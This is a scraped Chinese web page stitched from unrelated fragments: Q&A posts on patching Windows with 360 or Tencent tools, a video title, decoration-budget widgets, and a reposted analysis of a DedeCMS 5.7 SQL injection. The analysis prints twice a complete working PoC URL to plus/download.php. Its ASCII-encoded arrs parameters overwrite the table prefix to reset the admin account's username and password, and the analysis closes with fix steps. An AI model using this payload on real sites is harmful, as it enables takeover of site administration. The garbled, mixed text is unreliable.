不联网修复360漏洞修复方法

360不连网不能修复漏洞吗_百度知道
360不连网不能修复漏洞吗
因为修复漏洞需要从微软下载补丁才可以修复修复漏洞我建议你使用电脑管家电脑管家企业平台提问://d./c/guanjia" title="http.jpg" />它修复漏洞所使用的补丁是来自微软的.baidu://d.com/zhidao/wh%3D450%2C600/sign=dfa9ecfd7b5e/962bd40735fae6cdf84dc07f0db30f,如正版验证补丁://zhidao,你可以放心的修复有其它问题欢迎继续到<a href="http.baidu&任何软件不联网都是无法修复漏洞的
来自团队:
其他类似问题
为您推荐:
其他4条回答
不能,360修复漏洞的功能是windows系统自带的补丁功能的替代品,没有网络就不能下载补丁,所以就不能修复漏洞
目前必须连接网络下载。也许以后可以不连接网络修复
废话不花流量的话他挣什么
不 连接网是不 能修复的
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁Dedecms最新注入漏洞分析及修复方法
作者:佚名
字体:[ ] 来源:互联网 时间:06-11 15:28:01
最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现
最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。
一. 漏洞跟踪
发布时间:日
漏洞描述:
DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构,完全开源加上强大稳定的技术架构,既可以用来构建复杂体系的企业信息门户或电子商务网站平台,也可以用来管理简单内容发布网站,不管是商务资源门户还是娱乐信息门户,它都是您管理网站的好帮手。
漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[&arrs1&]、$GLOBALS[&arrs1&]这两个全局变量之前未对其进行初始化,导致能够覆盖任意全局变量。
漏洞危害:因为dedecms的使用非常广泛,而此漏洞利用方便,危害性高,能够远程获取管理后台,进而直接getshell获取系统控制权。
触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll,
如图所示:
受影响版本:dedecms 5.7
二. 漏洞原理
首先说一下dedecms不安全的参数处理机制,这里我们看一下/include/common.inc.php代码的第79行:
foreach(Array(&_GET&,'_POST&,'_COOKIE&) as $_request)
&&&&&&&&&&&& foreach($$_request as $_k =& $_v)
&&&&&&&&&&& {
&&&&&&&&&&&&&&&&&&& if($_k == &nvarname&) ${$_k} = $_v;
&&&&&&&&&&&&&&&&&& else ${$_k} = _RunMagicQuotes($_v);
&&&&&&&&&&& }
万恶之源其实就在这里,基本上目前dede被发现的漏洞全都死在这里。我们可以看到,程序从GPC数组中取出名值对后,只是对$_v做了简单的addslashes处理,就直接赋给了${$_k},实现了类似全局变量覆盖的机制,设计的初衷是为了开发方便,但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题,但是dede的这段代码使php付出的努力全部白费。
下面我们回归漏洞。
首先是/include/dedesql.class.php的第589-600行,
在执行这段代码之前,程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制,利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中,我们可以控制$GLOBALS['cfg_dbprefix']的值。
然后,我们来看一下如何利用$GLOBALS['cfg_dbprefix']。
这里在/include/dedesql.class.php的第512行SetQuery函数中,代码如下
这里因为$GLOBALS['cfg_dbprefix']是可控的,进而$prefix也是可控的,所以在这儿就造成了SQL注入。
下面跟踪一下整个漏洞的触发过程,这是网上已经公开的PoC:
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
首先看这个if判断,意思是如果开启了mysqli扩展,则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中,所以漏洞利用的前提条件是必须关闭mysqli扩展。
这里跟入dedesql.class.php代码,如图
这里我们传入的arrs1、arrs2两个数组因为还没有被初始化,所以这里$v1、$v2拼接为字符串,如图所示
所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为
admin` SET `userid`=&test&, `pwd`=&f297a57a5ae4& where id=1 #
继续跟踪代码执行,
跟入ExecuteNoneQuery2函数,一直跟进SetQuery,如图
这里因为$GLOBALS['cfg_dbprefix']是我们可控的,所以就造成了注入,这里看一下$sql的值,如图所示
因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤,所以这里借助它来注入。执行update成功之后,后台账户为test,密码为admin。
三. 漏洞验证
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
验证截图:
四. 漏洞修复
0&01、修改php.ini,确保开启php_mysqli.dll扩展。
0&02、修改/include/dedesql.class.php中的代码,如下所示
require_once(DEDEINC.&/common.func.php&);
//引入数据库类
if ($GLOBALS['cfg_mysql_type'] == &mysqli& && function_exists(&mysqli_init&))
&&&&&&& //echo $GLOBALS['cfg_mysql_type'];
&&&&&& require_once(DEDEINC.&/dedesqli.class.php&);
&&&&&&& require_once(DEDEINC.&/dedesql.class.php&);
//require_once(DEDEINC.&/common.func.php&);
大家感兴趣的内容
12345678910
最近更新的内容网络安全有漏洞 如何打补丁-小时-凤凰视频-最具媒体品质的综合视频门户-凤凰网
网络安全有漏洞 如何打补丁
电视不播的
真相在这找汉网天下广告赞助合作说明 (本站不以广告盈利,正迅速发展,鼓励...win7系统漏洞修复有哪几种方法?_电脑网络问题_土巴兔装修问答
win7系统漏洞修复有哪几种方法?
填写手机号码,获取预算明细
你的装修预算约
查看预算明细
0元卧室预算:
0元客厅预算:
0元厨房预算:
0元卫生间预算:
0元阳台预算:
0元其他预算:
*本价格为新房估算价格(半包,不含水电工程),旧房价格由实际工程量决定。
* 稍后装修管家将致电您,为您提供免费装修资询服务。
win7系统漏洞修复有哪几种方法?
提问者:方弘懿|
浏览次数:325|
提问时间: 19:44:45
热门活动:
已有3条答案
回答数:5641|被采纳数:2
所有回答:&5641
很多防护软件都可以修复漏洞的.
比如说:腾讯电脑管家.他不光能修复电脑系统的漏洞,还有其他强大的功能.
电脑管家具有定期体检、及时修复漏洞、实时防护功能。
同时腾讯电脑管家拥有管理软件、查杀木马、系统优化、帐号保护、硬件检测、软件搬家等功能!
回答数:16970|被采纳数:4
所有回答:&16970
目前修复漏洞的软件很多。建议用安全软件修复。
金山毒霸,下载软件既可一键修复所有漏洞。金山毒霸融合了启发式搜索、代码分析、虚拟机查毒等经业界证明成熟可靠的反病毒技术,使其在查杀病毒种类、查杀病毒速度、未知病毒防治等多方面达到先进水平。
360安全卫士。一键智能修复当前系统下所存在的漏洞。并可实时监视电脑所有硬件的温度。并有软件管理功能,一键升级或卸载软件,去插件安装。是电脑必备的精品安全软件。
希望我的回答对你有所帮助!
回答数:7710|被采纳数:21
所有回答:&7710
刚安装的win7系统系统,里面包含很多漏洞,是需要修复的,因此可以修复的。
WIN7系统更新方法:
1、尝试win7自带的更新方法更新。
方法:打开控制面板-》系统和安全(默认是在类别视图下)-》Windows &&Update。
2、如果win7自带更新工具无法,更新采用第三方更新工具更新,比如360安全卫士进行系统更新。
已有 3 个回答
已有 3 个回答
已有 4 个回答
已有 3 个回答
已有 3 个回答
已有 3 个回答
已有 5 个回答
已有 3 个回答
已有 3 个回答
已有 3 个回答
我已阅读并接受
*&&请放心填写,您的隐私将被严格保密
填写您的手机号码,获取预算明细
你的装修预算约
查看预算明细
0元卧室预算:
0元客厅预算:
0元厨房预算:
0元阳台预算:
0元卫生间预算:
0元其他预算:
*本价格为新房估算价格(半包,不含水电工程),旧房价格由实际工程量决定。
*稍后装修管家将致电您,为您提供免费装修资询服务。
下载土巴兔APP
中国装修网}

我要回帖

更多关于 360漏洞修复 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信